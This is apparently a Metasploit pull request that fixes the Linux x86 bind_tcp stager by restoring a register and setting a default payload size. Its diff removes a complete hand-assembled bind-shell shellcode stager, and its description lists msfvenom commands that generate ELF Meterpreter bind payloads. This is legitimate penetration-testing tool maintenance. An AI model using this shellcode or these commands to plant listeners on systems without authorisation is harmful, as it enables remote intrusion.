### PR TITLE
fixup bind_tcp linux stager for StagerCloseListenSocket

### DIFF
--- a/lib/msf/core/payload/linux/bind_tcp.rb
+++ b/lib/msf/core/payload/linux/bind_tcp.rb
@@ -55,7 +55,7 @@ module Payload::Linux::BindTcp
   #
   def required_space
     # Start with our cached default generated size
-    space = cached_size
+    space = 104
 
     # Reliability checks add 4 bytes for the first check, 5 per recv check (2)
     space += 14
@@ -119,6 +119,7 @@ module Payload::Linux::BindTcp
         int 0x80
         xchg eax,edi                  ; restore the socket handle
         add esp, 0x14
+        pop ecx
       ^
     end
 

--- a/modules/payloads/stagers/linux/x86/bind_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb
@@ -6,86 +6,26 @@
 
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/linux/bind_tcp'
 
+module Metasploit4
 
-###
-#
-# BindTcp
-# -------
-#
-# Linux bind TCP stager.
-#
-###
-module Metasploit3
-
-  CachedSize = 79
+  CachedSize = :dynamic
 
   include Msf::Payload::Stager
-  include Msf::Payload::Linux
+  include Msf::Payload::Linux::BindTcp
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Bind TCP Stager',
-      'Description'   => 'Listen for a connection',
-      'Author'        => [
-          'skape',  # original
-          'egypt',  # NX support
-        ],
+      'Name'          => 'Bind TCP Stager (Linux x86)',
+      'Description'   => 'Listen for a connection (Linux x86)',
+      'Author'        => [ 'skape', 'egypt', ],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_X86,
       'Handler'       => Msf::Handler::BindTcp,
-      'Stager'        =>
-        {
-          'Offsets' =>
-            {
-              'LPORT' => [ 0x29, 'n'    ],
-            },
-          'Payload' =>
-
-              "\x6a\x7d"             +#   push byte +0x7d
-              "\x58"                 +#   pop eax
-              "\x99"                 +#   cdq
-              "\xb2\x07"             +#   mov dl,0x7
-              "\xb9\x00\x10\x00\x00" +#   mov ecx,0x1000
-              "\x89\xe3"             +#   mov ebx,esp
-              "\x66\x81\xe3\x00\xf0" +#   and bx,0xf000
-              "\xcd\x80"             +#   int 0x80
-              "\x31\xdb"             +#   xor ebx,ebx
-              "\xf7\xe3"             +#   mul ebx
-              "\x53"                 +#   push ebx
-              "\x43"                 +#   inc ebx
-              "\x53"                 +#   push ebx
-              "\x6a\x02"             +#   push byte +0x2
-              "\x89\xe1"             +#   mov ecx,esp
-              "\xb0\x66"             +#   mov al,0x66
-              "\xcd\x80"             +#   int 0x80
-              "\x5b"                 +#   pop ebx
-              "\x5e"                 +#   pop esi
-              "\x52"                 +#   push edx
-              "\x68\x02\x00\xbf\xbf" +#   push dword 0xbfbf0002
-              "\x6a\x10"             +#   push byte +0x10
-              "\x51"                 +#   push ecx
-              "\x50"                 +#   push eax
-              "\x89\xe1"             +#   mov ecx,esp
-              "\x6a\x66"             +#   push byte +0x66
-              "\x58"                 +#   pop eax
-              "\xcd\x80"             +#   int 0x80
-              "\xd1\xe3"             +#   shl ebx,1
-              "\xb0\x66"             +#   mov al,0x66
-              "\xcd\x80"             +#   int 0x80
-              "\x43"                 +#   inc ebx
-              "\xb0\x66"             +#   mov al,0x66
-              "\x89\x51\x04"         +#   mov [ecx+0x4],edx
-              "\xcd\x80"             +#   int 0x80
-              "\x93"                 +#   xchg eax,ebx
-              "\xb6\x0c"             +#   mov dh,0xc
-              "\xb0\x03"             +#   mov al,0x3
-              "\xcd\x80"             +#   int 0x80
-              "\x89\xdf"             +#   mov edi,ebx
-              "\xff\xe1"              #   jmp ecx
-
-        }
+      'Convention'    => 'sockedi',
+      'Stager'        => { 'RequiresMidstager' => true }
       ))
   end
 

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -1348,7 +1348,7 @@ describe 'modules/payloads', :content do
                               'stagers/linux/x86/bind_tcp',
                               'stages/linux/x86/meterpreter'
                           ],
-                          dynamic_size: false,
+                          dynamic_size: true,
                           modules_pathname: modules_pathname,
                           reference_name: 'linux/x86/meterpreter/bind_tcp'
   end
@@ -1455,7 +1455,7 @@ describe 'modules/payloads', :content do
                               'stagers/linux/x86/bind_tcp',
                               'stages/linux/x86/shell'
                           ],
-                          dynamic_size: false,
+                          dynamic_size: true,
                           modules_pathname: modules_pathname,
                           reference_name: 'linux/x86/shell/bind_tcp'
   end


### PR DESCRIPTION
This fixes #5310 by restoring ecx and setting a default estimated payload size.
# Verification
- [x] ./msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 StagerCloseListenSocket=false -f elf -o bindx works
- [x] ./msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 StagerCloseListenSocket=true -f elf -o bindx works
